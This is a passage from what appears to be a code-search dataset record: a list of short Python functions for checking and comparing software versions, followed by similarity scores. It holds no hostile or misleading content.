self.data_version_yaml[\"current_version\"]\n )\n\n if checked is not None and not checked:\n # The current version is greater as the older one.\n\n # We return 
True.\n return True\n\n # We return False\n return False", "def get_version(cls):\n if Config.ENV_TYPE == PRD:\n return Config.version + \"/\" + Config.build\n return Config.version + \"/\" + Config.build + \"/\" + Config.generate + ' (' + Config.ENV_NAME + ')'", "def infer_webserver_package(release: str) -> str:\n if release == \"current_branch\":\n return \"dagster-webserver\"\n else:\n if not EARLIEST_TESTED_RELEASE:\n check.failed(\"Environment variable `$EARLIEST_TESTED_RELEASE` must be set.\")\n version = packaging.version.parse(release)\n return \"dagit\" if version < packaging.version.Version(\"1.3.14\") else \"dagster-webserver\"", "def postreleaser_before(data):\n\n data['dev_version_template'] = '%(new_version)s.dev'", "def test_version():\n assert(hasattr(tekel, '__version__'))", "def is_new_osx():\n name = distutils.util.get_platform()\n if sys.platform != \"darwin\":\n return False\n elif name.startswith(\"macosx-10\"):\n minor_version = int(name.split(\"-\")[1].split(\".\")[1])\n if minor_version >= 7:\n return True\n else:\n return False\n else:\n return False", "def firmware_outdated(self):\n datefmt = ' %b %d %Y %H:%M:%S'\n\n compat_date = self.compatible_firmware_version.split('compiled')[1]\n compat_date = datetime.datetime.strptime(compat_date, datefmt)\n\n fw_date = self.firmware_version.split('compiled')[1]\n fw_date = datetime.datetime.strptime(fw_date, datefmt)\n return (compat_date > fw_date)", "def isDBReleaseAvailable(dbh, version, lfns, jobPars):\n\n DBReleaseIsAvailable = False\n if version == \"\":\n tolog(\"Job parameters did not specify a DBRelease version (can not verify local availability)\")\n else:\n for lfn in lfns:\n if isDBReleaseFile(dbh, lfn):\n tolog(\"Found a DBRelease file in the input file list (will check local availability)\")\n\n # is the requested DBRelease file available locally?\n if dbh.isDBReleaseAvailable(version):\n tolog(\"%s is available locally (will not be staged-in)\" % (lfn))\n DBReleaseIsAvailable = True\n break\n\n return DBReleaseIsAvailable", "def is_version_sufficient(self, min_version):\n \n try:\n current_version = self.get_software_version()\n return LooseVersion(current_version) >= LooseVersion(min_version)\n except:\n raise", "def is_debian(distro):\n name = distro.lower()\n return name in debain", "def _is_released(self, lang_code):\r\n return any(lang_code.lower().startswith(released_lang.lower()) for released_lang in self.released_langs)", "def _is_version_uptodate(self):\n logging.info(\"Checking tesseract version\")\n cmd = '%s -v' % (self.binary)\n logging.info(cmd) \n try:\n ret_output = subprocess.check_output(cmd, shell=True, stderr=subprocess.STDOUT)\n except CalledProcessError:\n # Could not run tesseract\n error(self.msgs['TS_MISSING'])\n\n ver_str = '0.0.0'\n for line in ret_output.splitlines():\n if 'tesseract' in line:\n ver_str = line.split(' ')[1]\n if ver_str.endswith('dev'): # Fix for version strings that end in 'dev'\n ver_str = ver_str[:-3]\n\n # Iterate through the version dots\n ver = [int(x) for x in ver_str.split('.')]\n req = [int(x) for x in self.required.split('.')]\n\n # Aargh, in windows 3.02.02 is reported as version 3.02 \n # SFKM\n if str(os.name) == 'nt':\n req = req[:2]\n\n version_good = False\n for i,num in enumerate(req):\n if len(ver) < i+1:\n # This minor version number is not present in tesseract, so it must be\n # lower than required. 
(3.02 < 3.02.01)\n break\n if ver[i]==num and len(ver) == i+1 and len(ver)==len(req):\n # 3.02.02 == 3.02.02\n version_good = True\n continue\n if ver[i]>num:\n # 4.0 > 3.02.02\n # 3.03.02 > 3.02.02\n version_good = True\n break\n if ver[i]<num:\n # 3.01.02 < 3.02.02\n break\n \n return version_good, ver_str", "def is_stable_version(version):\n if not isinstance(version, tuple):\n version = version.split('.')\n last_part = version[-1]\n\n if not re.search('[a-zA-Z]', last_part):\n return True\n else:\n return False", "def test_undefined_semver(self):\n v1 = versions.Version(version='1.2.3', name='foo')\n expected = None\n\n self.assertEqual(v1.build, expected)", "def select_release():\n release_version = unitdata.kv().get(OPENSTACK_RELEASE_KEY, None)\n if release_version is None:\n release_version = os_utils.os_release('keystone')\n unitdata.kv().set(OPENSTACK_RELEASE_KEY, release_version)\n return release_version", "def new_version_available(self):\n return self._new_version_available", "def check_version_2(dataset):\n\n if float(dataset.get('version')) >= 2.0 \\\n if dataset.get('version') else False:\n return True\n else:\n return False", "def test_is_not_local_dev_from_presence(self):\n\n expected = False\n actual = Version.is_local_dev()\n\n self.assertEqual(expected, actual)", "def get_version_comparitor(self, requirement):\n if manage.is_inhouse_package(requirement.project_name):\n if self._prefer_final:\n log.debug(' in-house package, prefer-final')\n return easy_install._final_version\n else:\n log.debug(' in-house package, prefer-dev')\n return self.is_dev_version\n else:\n log.debug(' third-party package, always prefer-final')\n return easy_install._final_version", "def test_package_version():\n coverage_version = package_version('coverage')\n pytest_version = package_version('pytest')\n\n assert coverage_version is not None\n assert coverage_version < (1000, 0, 0)\n assert pytest_version is not None\n assert pytest_version > (5, 0)", "def python_compatible():\n result = False\n req_ver = vers.convert('3.9.5')\n pythonver = vers.convert('{major}.{minor}.{micro}'.format(major=sys.version_info.major,\n minor=sys.version_info.minor,\n micro=sys.version_info.micro))\n\n result = pythonver >= req_ver\n\n return result", "def is_deprecated(self) -> bool:\n if self.properties.deprecated:\n return True\n else:\n return False", "def test_is_production_env(self) -> None:\n os.environ.update({\"NC_MODE\": \"production\"})\n is_develop = is_development_env()\n self.assertFalse(is_develop)" ]
[ "0.7988306", "0.7390222", "0.72329897", "0.71225476", "0.70509773", "0.674931", "0.67251575", "0.66882837", "0.6623015", "0.6601849", "0.65394694", "0.64932364", "0.64372605", "0.639243", "0.63218457", "0.6310093", "0.62938845", "0.6283808", "0.6193949", "0.6171282", "0.60062796", "0.59985715", "0.59855986", "0.5979206", "0.5974908", "0.5971468", "0.59625405", "0.59610367", "0.5926642", "0.5908074", "0.5887973", "0.58862406", "0.58709323", "0.5869047", "0.58668804", "0.58635104", "0.58525807", "0.5851847", "0.58483344", "0.5845308", "0.58339125", "0.58290017", "0.58220255", "0.5820977", "0.58156407", "0.58006877", "0.57865053", "0.5783296", "0.57519835", "0.5749093", "0.5748391", "0.5747629", "0.5737114", "0.573557", "0.57279325", "0.57246256", "0.5723739", "0.56952953", "0.56951195", "0.5670077", "0.5667306", "0.56537515", "0.5650566", "0.5644464", "0.5643122", "0.5633318", "0.5630934", "0.56291276", "0.5624534", "0.5621977", "0.5619409", "0.5598538", "0.5582609", "0.55791783", "0.557526", "0.55744225", "0.556737", "0.55631566", "0.55626386", "0.55423594", "0.5540424", "0.5539596", "0.5532133", "0.5527763", "0.55272686", "0.5524132", "0.5514627", "0.55106163", "0.55016744", "0.5499714", "0.54818743", "0.54778945", "0.5477099", "0.5457959", "0.5450665", "0.5447296", "0.5442166", "0.5441259", "0.54285276", "0.5425926" ]
0.7183544
3
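Worked example (annotation, not a dataset row): the one-line document above delegates to packaging's is_prerelease property, which is True only when a pre-release (a/b/rc) or dev (.devN) segment is present — so post-releases still count as stable. A minimal sketch under that assumption:

from packaging.version import Version

def is_stable(version: str) -> bool:
    # Stable means no pre-release (a/b/rc) and no dev (.devN) segment;
    # a post-release such as 1.2.3.post1 still counts as stable.
    return not Version(version).is_prerelease

assert is_stable("1.2.3")
assert is_stable("1.2.3.post1")
assert not is_stable("1.2.3rc1")
assert not is_stable("1.2.3.dev4")

The next row's get_stable document complements this predicate: it strips pre, post, dev, and local segments to recover the bare (major, minor, micro) release.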
Get stable version from pre or post release.
def get_stable(self: _R) -> _R: return self._replace( BaseVersion( epoch=0, release=(self.major, self.minor, self.micro), pre=None, post=None, dev=None, local=None, ) )
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def next_version(major=False, minor=False, patch=True):\n try:\n r = Release.objects.latest()\n except Release.DoesNotExist:\n return Version('0.0.0')\n\n v = r.version\n if major:\n v = v.next_major()\n elif minor:\n v = v.next_minor()\n else:\n v = v.next_patch()\n return v", "def get_version():\n return \"0.0.1 (prerelease prototype)\"", "def current_version(self):\n try:\n return self.release_set.order_by('-created')[0].version\n except IndexError:\n return \"0.0.0\"", "def is_release():\n return VERSION[-1]", "def get_prerelease_package_version(self, production: bool = False) -> str:\n rc = 1\n if describe := get_git_describe(CONFIG.mpy_path.as_posix()):\n ver, rc, _ = describe.split(\"-\")\n base = bump_version(Version(ver), minor_bump=True)\n rc = int(rc)\n return str(bump_version(base, rc=rc))\n else:\n raise ValueError(\"cannot determine next version number micropython\")", "def stable():\n env.branch = 'stable'", "def get_release(self, is_vertebrate: bool) -> int:\n ext = \"/info/data/?\" if is_vertebrate else \"/info/eg_version?\"\n ret = retry(request_json, 3, self._url, ext)\n return int(ret[\"releases\"][0] if is_vertebrate else ret[\"version\"])", "def next_version(self):\n try:\n release = self.release_set.order_by('-created')[0]\n except IndexError:\n return \"0.1.0\"\n\n major, minor, bugfix = release.version.split(\".\")\n\n return \"{}.{}.{}\".format(major, int(minor) + 1, bugfix)", "def test_request_estable_version(self):\n current_stable_version = get_stable_version()\n self.assertIsNotNone(current_stable_version)", "def get_latest_release_version():\n repo = GITHUB.get_user(GITHUB_OWNER).get_repo(GITHUB_REPO)\n latest_release_version = repo.get_latest_release().tag_name\n return latest_release_version", "def get_next_package_version(self, prod: bool = False) -> str:\n base = Version(self.pkg_version)\n if pypi_versions := get_pypi_versions(self.package_name, production=prod, base=base):\n self.pkg_version = str(pypi_versions[-1])\n return self.bump()", "def get_version():\n git_root = find_git_root(dirname(__file__))\n\n if git_root is not None:\n # Get the version using \"git describe\".\n cmd = \"git describe --tags --match [0-9]*\".split()\n try:\n version = subprocess.check_output(cmd).decode().strip()\n except subprocess.CalledProcessError:\n logger.exception(\"Unable to get version number from git tags\")\n exit(1)\n\n # PEP 386 compatibility\n if \"-\" in version:\n version = \".post\".join(version.split(\"-\")[:2])\n\n # Don't declare a version \"dirty\" merely because a time stamp has\n # changed. 
If it is dirty, append a \".dev1\" suffix to indicate a\n # development revision after the release.\n with open(os.devnull, \"w\") as fd_devnull:\n subprocess.call([\"git\", \"status\"], stdout=fd_devnull, stderr=fd_devnull)\n\n cmd = \"git diff-index --name-only HEAD\".split()\n try:\n dirty = subprocess.check_output(cmd).decode().strip()\n except subprocess.CalledProcessError:\n logger.exception(\"Unable to get git index status\")\n exit(1)\n\n if dirty != \"\":\n version += \".dev1\"\n\n return version\n\n else:\n try:\n return pkg_resources.working_set.by_key[\"graphql-validate\"].version\n except KeyError:\n return \"0.0.0-unreleased\"", "def get_current_release():\n return _CURRENT_RELEASE", "def select_release():\n release_version = unitdata.kv().get(OPENSTACK_RELEASE_KEY, None)\n if release_version is None:\n release_version = os_utils.os_release('keystone')\n unitdata.kv().set(OPENSTACK_RELEASE_KEY, release_version)\n return release_version", "def is_stable(self) -> bool:\n return not self.is_prerelease", "def get_increased_version():\n logs = get_rolling_log_history()\n\n if has_breaking_changes(logs):\n return get_increased_base_version(0)\n if has_features(logs):\n return get_increased_base_version(1)\n if has_fixes(logs):\n return get_increased_base_version(2)", "def test_release_tag_for_dev_version(self) -> None:\n self.assertEqual(\"v42.12\", release_tag())", "def get_base_version():\n if BASE_VERSION is None:\n return shell_output('git describe --tags --abbrev=0')\n return BASE_VERSION", "def get_version():\n return 1", "def get_latest_version(self):\n latest_release = self._http_client.get(self._github_repo + '/releases/latest')\n if not 'tag_name' in latest_release.json():\n return None\n version = latest_release.json()['tag_name']\n latest_release.close()\n return version", "def latest_version(self):\n state = self.coordinator.data\n\n try:\n # fake a new update\n # return \"foobar\"\n return dict_get(state, \"firmware_update_info.base.version\")\n except KeyError:\n return None", "def get_release_info(version='v1.1-dev', date='2021-07-22'):\n # go to the repository directory\n dir_orig = os.getcwd()\n os.chdir(os.path.dirname(os.path.dirname(__file__)))\n\n # grab git info into string\n try:\n cmd = \"git describe --tags\"\n version = subprocess.check_output(cmd.split(), stderr=subprocess.DEVNULL)\n version = version.decode('utf-8').strip()\n\n # if there are new commits after the latest release\n if '-' in version:\n version, num_commit = version.split('-')[:2]\n version += '-{}'.format(num_commit)\n\n cmd = \"git log -1 --date=short --format=%cd\"\n date = subprocess.check_output(cmd.split(), stderr=subprocess.DEVNULL)\n date = date.decode('utf-8').strip()\n except:\n pass\n\n # go back to the original directory\n os.chdir(dir_orig)\n return version, date", "def get_new_version(version, IS_ARCHIVE, IS_RELEASE):\n\n if not IS_ARCHIVE and not IS_RELEASE:\n return version\n\n version_split = version.split('.')\n version_split_sigfigs = len(version_split)\n\n # ARCHIVE\n if IS_ARCHIVE:\n if version_split_sigfigs == 2:\n version_split[1] = str(0)\n else:\n del version_split[-1]\n version = \".\".join(version_split)\n return version\n\n # Release\n else:\n version_split[version_split_sigfigs-1] = str(int(version_split[version_split_sigfigs-1]) + 1)\n return \".\".join(version_split)", "def get_git_version(abbrev=4):\n # Read in the version that's currently in RELEASE-VERSION.\n release_version = read_release_version()\n\n # First try to get the current version using \"git 
describe\".\n tag, count, _ = call_git_describe(abbrev)\n\n if count == '0':\n if tag:\n # Normal tagged release\n version = tag\n else:\n # This is an odd case where the git repo/branch can't find a tag\n version = \"0.dev0\"\n elif count:\n # Non-zero count means a development release after the last tag\n version = \"{}.dev{}\".format(tag, count)\n else:\n # Build count wasn't returned at all. Fall back on the value that's in\n # the packaged RELEASE-VERSION file\n version = release_version\n\n # If the current version is different from what's in the\n # RELEASE-VERSION file, update the file to be current.\n if version != release_version:\n write_release_version(version)\n\n # Finally, return the current version.\n return version", "def increment(version):\n release_version = os.environ.get(\"RELEASE_VERSION\", None)\n if release_version is not None:\n return release_version\n if isinstance(version, LegacyVersion):\n msg = \"\"\"{0} is considered a legacy version and does not\n support automatic incrementing. Please bring your version\n numbering into PEP440 standards and then it can be\n automatically incremented.\n \"\"\"\n raise Exception(msg.format(version))\n release_type = os.environ.get(\"RELEASE_TYPE\", \"micro\")\n v = version._version\n # epoch\n epoch_name, epoch = VersionUtils.get_version_number(v, 0, None, \"!\")\n pre_name, pre = VersionUtils.get_version_number(v, 3, None, \"pre\")\n post_name, post = VersionUtils.get_version_number(v, 4, None, \"post\")\n dev_name, dev = VersionUtils.get_version_number(v, 2, None, \"dev\")\n _, major = VersionUtils.get_version_number(v[1], 0, 0)\n _, minor = VersionUtils.get_version_number(v[1], 1, None)\n _, micro = VersionUtils.get_version_number(v[1], 2, None)\n\n # Handle dev/pre/post\n if release_type == \"pre\":\n micro, post, pre = VersionUtils.process_pre(micro, post, pre)\n\n if release_type == \"post\":\n dev, post = VersionUtils.process_post(dev, post)\n\n if release_type == \"dev\":\n dev = VersionUtils.process_dev(dev)\n\n if release_type == \"micro\":\n dev, micro, minor, post, pre = VersionUtils.process_micro(\n dev, micro, minor, post, pre\n )\n\n if release_type == \"minor\":\n dev, micro, minor, post, pre = VersionUtils.process_minor(\n dev, micro, minor, post, pre\n )\n\n if release_type == \"major\":\n dev, major, micro, minor, post, pre = VersionUtils.process_major(\n dev, major, micro, minor, post, pre\n )\n\n # Handle Epoch\n if release_type == \"epoch\":\n dev, epoch, major, micro, minor, post, pre = VersionUtils.process_epoch(\n dev, epoch, major, micro, minor, post, pre\n )\n\n local = \"\".join(v[5] or []) or None\n\n version_list = [major, minor, micro]\n if release_type not in [\"epoch\", \"major\", \"minor\", \"micro\", \"pre\"]:\n version_list += list(v[1][3:])\n version_string = \".\".join([str(x) for x in version_list if x or x == 0])\n\n if epoch:\n version_string = str(epoch) + epoch_name + version_string\n if pre is not None:\n version_string = VersionUtils.calc_pre_version_string(\n pre, pre_name, version_string\n )\n if post is not None:\n version_string += \".\" + post_name + str(post)\n if dev is not None:\n version_string += \".\" + dev_name + str(dev)\n if local is not None:\n version_string += \".\" + str(local)\n\n return version_string", "def get_version():\n\n with open('__init__.py') as f:\n for line in f.readlines():\n if '__version__' in line:\n apicem_version = line.strip().split(\"=\")[-1].strip(\" '\")\n if '__first_release_date__' in line:\n first_release_data_str = 
line.strip().split(\"=\")[-1].strip(\" '\")\n first_release_data = date(*[int(num) for num in first_release_data_str.split('.')])\n num_commits = get_cr_num(first_release_data)\n return '{apicem_version}.{num_commits}'.format(\n apicem_version=apicem_version, num_commits=num_commits)\n\n raise ValueError(\"could not read version\")", "def get_distrib_version():\n distrib, version, codename = _get_release_infos() \n return version", "def latest_release_get():\n try:\n return json_response.success({'version': version.latest_version()})\n except version.Error as e:\n return json_response.error(str(e)), 200", "def get_version():\n click.echo(get_current_version_number())", "def test_beta_to_stable(self):\n self.change_version(self.version_1_2_0, '1.2beta')\n self.change_status(self.version_1_2_0, amo.STATUS_BETA)\n\n version, file = self.get('1.2beta', self.version_int,\n self.app, self.platform)\n assert version == self.version_1_2_2", "def get_github_library_version(name, url):\n while True:\n # For the release, make sure the default versions do not include \"-dev\"\n version = raw_input(\"Version of %s?: \" % name)\n if not url_exists(\"%s/releases/tag/%s\" % (url, version)):\n print_warning(\"The version of %s is not valid. Ensure you've chosen a correct value by checking the \"\n \"GitHub releases for exact naming at \"\n \"%s/releases before you continue.\" % (name, url))\n return version", "def get_version(version=None):\n if version is None:\n version = VERSION\n assert len(version) == 5\n assert version[3] in (\"alpha\", \"beta\", \"rc\", \"final\")\n\n parts = 2 if version[2] == 0 else 3\n main = \".\".join(str(digit) for digit in version[:parts])\n\n sub = \"\"\n if version[3] != \"final\":\n mapping = {\"alpha\": \"a\", \"beta\": \"b\", \"rc\": \"rc\"}\n sub = mapping[version[3]] + str(version[4])\n\n return main + sub", "def current_version(self):\n if self.current_tag:\n version = self.current_tag.lstrip('v')\n else:\n version = None\n\n if version and not version_is_valid(version):\n version = None\n\n return version", "def getversion(online: bool = True) -> str:\n branches = {\n 'master': 'branches/master',\n 'stable': 'branches/stable',\n }\n data = getversiondict()\n data['cmp_ver'] = 'n/a'\n local_hsh = data.get('hsh', '')\n hsh = {}\n\n if online:\n if not local_hsh:\n data['cmp_ver'] = 'UNKNOWN'\n else:\n for branch, path in branches.items():\n with suppress(Exception):\n hsh[getversion_onlinerepo(path)] = branch\n if hsh:\n data['cmp_ver'] = hsh.get(local_hsh, 'OUTDATED')\n\n data['hsh'] = local_hsh[:7] # make short hash from full hash\n return '{tag} ({hsh}, {rev}, {date}, {cmp_ver})'.format_map(data)", "def bump_postrelease(self: _R, inc: int = 1) -> _R:\n post = (VersionParts.POST, max(inc, 1))\n base_post: Optional[Tuple[str, int]] = self._version.post\n if base_post:\n post = (VersionParts.POST, max(base_post[1], 1) + inc)\n base = BaseVersion(\n epoch=0,\n release=self._version.release,\n pre=None,\n post=post,\n dev=None,\n local=None,\n )\n return self._replace(base)", "def get_version():\n return '%d.%d.%d' % version_info", "def GetApiVersion(cls):\n if cls.ReleaseTrack() == base.ReleaseTrack.ALPHA:\n return 'alpha'\n elif cls.ReleaseTrack() == base.ReleaseTrack.BETA:\n return 'beta'\n return 'v1'", "def getversion(): # 3\n res,resargs = _msk.Env.getversion()\n if res != 0:\n raise Error(rescode(res),\"\")\n _major_return_value,_minor_return_value,_build_return_value,_revision_return_value = resargs\n return 
_major_return_value,_minor_return_value,_build_return_value,_revision_return_value", "def get_latest_version(self):\n try:\n version = self.sourcestudyversion_set.filter(\n i_is_deprecated=False\n ).order_by( # We can't use \"latest\" since it only accepts one field in Django 1.11.\n '-i_version',\n '-i_date_added'\n ).first()\n except ObjectDoesNotExist:\n return None\n return version", "def get_latest_release(self):\n cs = Custom_Soup(\n \"latest_release\", \"https://chromedriver.storage.googleapis.com/LATEST_RELEASE_\" + str(self.version))\n cs.get_request()\n self.latest_release = cs.get_text()", "def compute_version_for_latest(project_name, org_name, repo_name, distro_name):\n #TODO: update for h turtle\n assert distro_name in ['fuerte', 'groovy']\n if distro_name == 'fuerte':\n release = 'lucid'\n else:\n release = 'precise'\n project_name = project_name.replace('_', '-')\n prefix = 'debian/ros-%s-%s_'%(distro_name, project_name)\n suffix = '_%s'%(release)\n tags = list_tags(org_name, repo_name, prefix)\n tags = [t[:-len(suffix)] for t in tags if t.endswith(suffix)]\n if not tags:\n return None\n print(\"TAGS\", [t[len(prefix):] for t in tags])\n \n versions = sorted([distutils.version.LooseVersion(t[len(prefix):]) for t in tags])\n if not versions:\n return None\n version = versions[-1].vstring #for pattern\n return '%s%s%s'%(prefix, version, suffix)", "def update_pkg_version(self, production: bool) -> str:\n return (\n self.get_prerelease_package_version(production) if self.mpy_version == \"latest\" else self.get_next_package_version(production)\n )", "def __getattr__(self, name):\n if name in ('epoch', 'release', 'pre', ):\n return getattr(self._version, name)\n if name in ('post', 'dev'):\n attr = getattr(self._version, name)\n return attr[1] if attr else None\n if name == 'is_devrelease':\n return self.dev is not None\n\n parts = ('major', 'minor', 'micro')\n try:\n index = parts.index(name)\n except ValueError:\n raise AttributeError('{!r} object has to attribute {!r}'\n .format(type(self).__name__, name)) from None\n release = self.release\n return release[index] if len(release) >= index + 1 else 0", "def get_version():\n return __version__", "def get_version():\n return __version__", "def get_version():\n return __version__", "def test_pre_release(scraper, version_parts):\n\n new_version_parts = list(version_parts)\n if len(new_version_parts) > 4:\n new_version_parts[4] = int(new_version_parts[4]) + 1\n elif len(new_version_parts) > 3:\n new_version_parts.append(1)\n else:\n new_version_parts.extend(['a', 1])\n\n assert scraper.is_compatible_with(generate_version(new_version_parts)) is True", "async def fetch_data(self) -> GitHubReleaseModel | None:\n result = await self._client.repos.releases.list(\n self.repository, **{\"params\": {\"per_page\": 1}}\n )\n if not result.data:\n return None\n\n for release in result.data:\n if not release.prerelease:\n return release\n\n # Fall back to the latest release if no non-prerelease release is found\n return result.data[0]", "def get_version():\n vers = [\"%(major)i.%(minor)i\" % __version_info__, ]\n\n if __version_info__['micro']:\n vers.append(\".%(micro)i\" % __version_info__)\n if __version_info__['releaselevel'] != 'final':\n vers.append('%(releaselevel)s' % __version_info__)\n return ''.join(vers)", "def getDBReleaseVersion(dbh, jobPars):\n\n return dbh.getDBReleaseVersion(jobPars=jobPars)", "def update_version() -> str:\n cur_version = get_current_version(args.stage)\n\n if args.stage == \"prod\":\n prv_version = 
get_current_version(stage='staging')\n new_version = semver.finalize_version(prv_version)\n elif args.stage == \"staging\":\n prv_version = get_current_version(stage='integration')\n assert '-integration' in prv_version\n new_version = prv_version.replace('-integration', '-rc') # don't bump the version number\n else:\n new_version = getattr(semver, f'bump_{args.release}')(str(cur_version))\n new_version = new_version if semver.parse_version_info(new_version).prerelease \\\n else semver.bump_prerelease(new_version, token='integration')\n\n if cur_version == new_version:\n print(\"Nothing to promote\")\n exit(0)\n else:\n print(f\"Upgrading: {cur_version} -> {new_version}\")\n return new_version", "def get_version():\r\n return __version__", "def get_sg_jira_bridge_version():\n # Note: if you install from a cloned git repository\n # (e.g. pip install ./tk-core), the version number\n # will be picked up from the most recently added tag.\n try:\n version_git = subprocess.check_output(\n [\"git\", \"describe\", \"--abbrev=0\"]\n ).rstrip()\n return version_git\n except Exception:\n # Blindly ignore problems. Git might be not available, or the user may\n # have installed via a zip archive, etc...\n pass\n\n return \"dev\"", "def get_revision(self):\n vers = self.send(\"?R\", recv=True)\n # Verify its a valid version\n # ? why was this commented out\n float(vers)\n # But return as string to avoid precision issues\n return vers", "def _get_version(self):", "def get_latest_schemaorg_version():\n tag_name = requests.get(SCHEMAORG_VERSION_URL).json()[\"tag_name\"] # \"v13.0-release\"\n mat = re.match(r\"v([\\d.]+)-release\", tag_name)\n if not mat:\n raise ValueError(f\"Unrecognized release tag name {tag_name}\")\n latest = mat.group(1)\n return latest", "def get_revision(self) -> str:\n try:\n return self.cmd.rev_parse(verify=True, args=\"HEAD\", check_returncode=True)\n except exc.CommandError:\n return \"initial\"", "def read_release_version():\n with open(\"RELEASE-VERSION\", \"r\") as f:\n return f.readline().strip()", "def test_beta_updates_to_stable(self):\n self.change_version(self.version_1_2_0, '1.2beta')\n self.change_status(self.version_1_2_0, amo.STATUS_BETA)\n self.change_status(self.version_1_2_2, amo.STATUS_BETA)\n\n version, file = self.get('1.2beta', self.version_int,\n self.app, self.platform)\n assert version == self.version_1_2_1", "def get_previous_release_info(\n previous_release_version: str | None, past_releases: list[ReleaseInfo], current_release_version: str\n) -> str | None:\n previous_release = None\n if previous_release_version == current_release_version:\n # Re-running for current release - use previous release as base for git log\n if len(past_releases) > 1:\n previous_release = past_releases[1].last_commit_hash\n else:\n previous_release = past_releases[0].last_commit_hash if past_releases else None\n return previous_release", "def semver_from(changelog: Path) -> Version:\n with open(changelog) as f:\n matches = SEMVER_RE.finditer(f.read())\n versions: List[Version] = []\n is_unreleased = False\n for match in matches:\n version = match.groupdict()[\"version\"]\n if version.lower() == \"unreleased\":\n is_unreleased = True\n else:\n versions.append(Version.parse(version))\n\n versions.sort()\n latest = versions[-1]\n print(latest)\n return latest.bump_prerelease() if is_unreleased else latest", "def get_build_version():\n package_version = __version__\n tags = (\n subprocess.run(\n [\"/usr/bin/git\", \"tag\", \"--points-at\", \"HEAD\"],\n 
cwd=os.path.dirname(os.path.realpath(__file__)),\n stdout=subprocess.PIPE,\n check=True,\n )\n .stdout.decode(\"utf-8\")\n .strip(\"\\n\")\n .split(\"\\n\")\n )\n commit_id = (\n subprocess.run(\n [\"/usr/bin/git\", \"rev-parse\", \"--short\", \"HEAD\"],\n cwd=os.path.dirname(os.path.realpath(__file__)),\n stdout=subprocess.PIPE,\n check=True,\n )\n .stdout.decode(\"utf-8\")\n .strip(\"\\n\")\n )\n\n version_tags = _select_version_tags(tags)\n if len(version_tags) > 1:\n raise exc.QgrVersionError(\n f\"Can not determine desired version from tags: {tags}\",\n )\n\n if len(version_tags) == 1:\n version = version_tags[0]\n else:\n # If there is no version tag, build a unique version string\n version = f\"{package_version}-{commit_id}\"\n\n return version", "def test_changeVersionsWithPrerelease(self):\n self._testVersionChanging(9, 2, 7, 38)", "def make_semver(repo_root, build_number):\n branch_name, sha, tags = parse_describe(repo_root)\n if tags:\n # There are git tags to consider. Parse them all then choose the one that is latest (sorted by semver rules)\n return sorted([make_version_number(branch_name, build_number, tag, sha) for tag in tags])[-1]\n else:\n return make_version_number(branch_name, build_number, None, sha)", "def test_finder_installs_pre_releases(data: TestData) -> None:\n\n req = install_req_from_line(\"bar\")\n\n # using a local index (that has pre & dev releases)\n finder = make_test_finder(\n index_urls=[data.index_url(\"pre\")],\n allow_all_prereleases=True,\n )\n found = finder.find_requirement(req, False)\n assert found is not None\n assert found.link.url.endswith(\"bar-2.0b1.tar.gz\"), found.link.url\n\n # using find-links\n links = [\"https://foo/bar-1.0.tar.gz\", \"https://foo/bar-2.0b1.tar.gz\"]\n\n finder = make_test_finder(links, allow_all_prereleases=True)\n found = finder.find_requirement(req, False)\n assert found is not None\n assert found.link.url == \"https://foo/bar-2.0b1.tar.gz\"\n\n links.reverse()\n\n finder = make_test_finder(links, allow_all_prereleases=True)\n found = finder.find_requirement(req, False)\n assert found is not None\n assert found.link.url == \"https://foo/bar-2.0b1.tar.gz\"", "def detect_version(self):\n\n version = self.scm_object.detect_version(self.args.__dict__).strip()\n logging.debug(\"VERSION(auto): %s\", version)\n return version", "def test_release_update_available_MAJOR(self):\n NEXT = '%d.%d-%d' % (MAJOR + 1, 0, 0)\n self._uri({\n '%d.%d/maintained/%s/all/Packages.gz' % (MAJOR + 1, 0, NEXT): DATA,\n })\n next = self.u.release_update_available()\n self.assertEqual(NEXT, next)", "def get_dev_version(self, increment_part):\n self.project.set_property(\n 'semver_git_tag_increment_part', increment_part)\n set_version_from_git_tag(self.project, self.logger)", "def _get_version():\n try:\n code, output = _run_cmd('git', 'describe', '--tags')\n if code:\n return 'unknown'\n output = output.decode('utf8').strip().split('-')\n if len(output) != 3:\n return 'unknown'\n version = '%s+%s' % (output[0], output[2])\n\n code, _ = _run_cmd('git', 'diff', '--quiet')\n if code:\n version += '+dirty'\n\n return version\n except OSError:\n return 'unknown'", "def getversion():\r\n\r\n global VERSION\r\n\r\n if len(VERSION) == 3:\r\n return '{}.{}.{}'.format(VERSION[0], VERSION[1], VERSION[2])\r\n else:\r\n return '{}.{}.{}-{}'.format(VERSION[0], VERSION[1], VERSION[2], VERSION[3])", "def get_comp_versions (component):\n vprint (\"Detecting current version for \" + component)\n\n regex = re.compile (r\"version \" + version_restr)\n major = 
component + \"_major\"\n minor = component + \"_minor\"\n micro = component + \"_micro\"\n\n\n version = (None, None, None)\n with open (doc_root + \"/ACE_TAO/\" + component + \"/VERSION.txt\") as version_file:\n for line in version_file:\n match = regex.search (line)\n if match is not None:\n version = match.groups(default=0)\n\n vprint (\"Detected version %s.%s.%s\" % version)\n\n comp_versions[major] = int (version[0])\n comp_versions[minor] = int (version[1])\n comp_versions[micro] = int (version[2])\n\n break\n\n print (\"FATAL ERROR: Unable to locate current version for \" + component)\n raise Exception\n\n # Also store the current release (old from now)\n old_comp_versions[major] = comp_versions[major]\n old_comp_versions[minor] = comp_versions[minor]\n old_comp_versions[micro] = comp_versions[micro]\n\n if opts.update:\n if opts.release_type == ReleaseType.major:\n comp_versions[major] += 1\n comp_versions[minor] = 0\n comp_versions[micro] = 0\n elif opts.release_type == ReleaseType.minor:\n comp_versions[minor] += 1\n comp_versions[micro] = 0\n elif opts.release_type == ReleaseType.micro:\n comp_versions[micro] += 1\n\n def make_version (versions, joiner):\n return joiner.join ([\n str (versions[component + '_' + x]) for x in ReleaseType.__members__.keys ()\n ])\n\n comp_versions [component + \"_version\"] = make_version (comp_versions, '.')\n comp_versions [component + \"_version_\"] = make_version (comp_versions, '_')\n\n comp_versions [component + \"_code\"] = \\\n (comp_versions[major] << 16) + \\\n (comp_versions[minor] << 8) + \\\n comp_versions[micro]\n\n old_comp_versions [component + \"_version\"] = make_version (old_comp_versions, '.')\n old_comp_versions [component + \"_version_\"] = make_version (old_comp_versions, '_')\n\n if opts.update:\n vprint (\"Updating from version %s to version %s\" %\n (old_comp_versions [component + \"_version\"], comp_versions [component + \"_version\"]))\n else:\n vprint (\"Found version %s\" %\n (comp_versions [component + 